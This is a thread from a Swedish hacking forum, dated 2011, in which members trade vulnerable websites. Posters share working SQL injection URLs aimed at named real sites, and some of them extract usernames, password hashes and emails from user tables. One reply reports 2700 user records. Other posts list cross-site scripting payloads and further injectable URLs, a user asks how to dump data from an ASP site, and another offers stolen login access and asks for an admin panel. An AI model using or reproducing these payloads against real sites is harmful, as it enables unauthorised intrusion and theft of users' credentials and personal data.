1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-06-05, 03:25
  #2953
PostWhore
Medlem
PostWhores avatar
http://newsbrook.se/om/flashback

Är det någon eller är det bara skit?
Citera
2011-06-05, 04:34
  #2954
Recons
Medlem
Reconss avatar
Citat:
Ursprungligen postat av PostWhore
http://newsbrook.se/om/flashback

Är det någon eller är det bara skit?
Den genererar en sida med innehåll relaterat till valt sökord.. http://newsbrook.se/om/bajs t.ex.
Citera
2011-06-05, 13:33
  #2955
ant'
Medlem
ant's avatar
Citat:
Ursprungligen postat av PostWhore
http://newsbrook.se/om/flashback

Är det någon eller är det bara skit?
Kod: 
http://newsbrook.se/om/<script>alert("flashback")</script>
Citera
2011-06-06, 00:47
  #2956
chippzy
Medlem
var ett tag sedan jag pillade med säkerhetsbrister men iaf här är en. vet inte om usr_password lr usr_hash är rätta för lösenordet.

Kod: 
http://www.swebmx.com/blog_index.php?blogpost=-418%20union%20all%20select%201,2,3,4,5,6,group_concat(username,0x3a,usr_pas  sword,0x3a,email),8%20from%20users_tbl--

Kod: 
http://www.swebmx.com/blog_index.php?blogpost=-418%20union%20all%20select%201,2,3,4,5,6,group_concat(username,0x3a,usr_has  h,0x3a,email),8%20from%20users_tbl--
Citera
2011-06-06, 01:54
  #2957
PostWhore
Medlem
PostWhores avatar
Citat:
Ursprungligen postat av chippzy
var ett tag sedan jag pillade med säkerhetsbrister men iaf här är en. vet inte om usr_password lr usr_hash är rätta för lösenordet.

Kod: 
http://www.swebmx.com/blog_index.php?blogpost=-418%20union%20all%20select%201,2,3,4,5,6,group_concat(username,0x3a,usr_pas  sword,0x3a,email),8%20from%20users_tbl--

Kod: 
http://www.swebmx.com/blog_index.php?blogpost=-418%20union%20all%20select%201,2,3,4,5,6,group_concat(username,0x3a,usr_has  h,0x3a,email),8%20from%20users_tbl--
Count(*) of fulltupp_swebmx.users_tbl is 2700
Citera
2011-06-06, 12:38
  #2958
vicious
Medlem
Kod: 
http://www.component.se/docs.php?id=%
http://www.teleborgsslott.com/page.php?id=%
http://www.tranceland.org/article.php?id=null%20union%20all%20select%201,2,3,4,5--
http://www.carlssonplanet.com/newsletter_view_old.php?id='
http://www.sakerhetsbutiken.se/artikel.php?id=34

__________________
Senast redigerad av vicious 2011-06-06 kl. 13:06. Anledning: länkar
Citera
2011-06-06, 16:35
  #2959
vicious
Medlem
...mera skit sidor
Kod: 
http://www.kitas.se/visanyhet.php?id=null%20union%20all%20select%201,@@version,3,4,5,6--
http://forever-young.nu/item.php?id='
http://www.sailguide.com/batfakta/info.php?id=%
http://www.simgrodan.com/art.php?id=null'
http://www.linkopingsakvarellsallskap.se/viewmember.php?id=null%20union%20all%20select%201,2,3,4,5,6,7--
http://www.middagsdags.se/recept.php?id=%
Citera
2011-06-06, 19:27
  #2960
Pelle-pirat
Medlem
Citat:
Ursprungligen postat av PostWhore
OnT
Är det här något?
https://consultants.apple.com/nz/locator_results.php?sl=AU%27'

https://consultants.apple.com/nz/loc...9%3C/script%3E
Citera
2011-06-06, 20:39
  #2961
deyy
Medlem
deyys avatar
Kan inte garantera att detta funkar dock. Ska ha funkat tidigare iallafall. Tycker att det passar bra nu när det är nationaldagen och allt. Kan ju ha bytt lösenord då det är några veckor/någon månad gammalt.
__________________
Senast redigerad av deyy 2011-06-06 kl. 20:42.
Citera
2011-06-06, 20:50
  #2962
ScamHunter
Bannlyst
Citat:
Ursprungligen postat av deyy
Kan inte garantera att detta funkar dock. Ska ha funkat tidigare iallafall. Tycker att det passar bra nu när det är nationaldagen och allt. Kan ju ha bytt lösenord då det är några veckor/någon månad gammalt.

funkar icke!
Citera
2011-06-06, 21:28
  #2963
tmxseven
Medlem
tmxsevens avatar
Låt säga att en sida: www.[site].com/index.asp?id=1'

Man får upp följande:

Microsoft VBScript runtime hata '800a000d'

Type mismatch: '[string: "1'"]'

Hur löser man detta för att kunna dumpa data?

T.ex. om man skriver: www.[site].com/index.asp?id=999999

Så får man upp:

Microsoft VBScript runtime hata '800a0006'

Overflow: 'cint'

Någon som vet hur man ska göra?
Citera
2011-06-06, 22:11
  #2964
deyy
Medlem
deyys avatar
Citat:
Ursprungligen postat av ScamHunter
funkar icke!
Var testade du logga in?
Har du hittat admin/skribent-panelen så skulle jag gärna ta emot den i pm.
Tänkte bara ifall du testade på startsidan för plus-konton.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in